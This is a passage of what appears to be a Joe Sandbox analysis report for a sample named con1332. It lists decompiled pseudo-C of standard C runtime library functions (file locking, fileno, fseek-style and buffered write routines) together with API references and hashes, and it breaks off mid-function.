Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2ca1638
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2ca1638
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2ca1638
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02CA1638), ref: 00414050

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
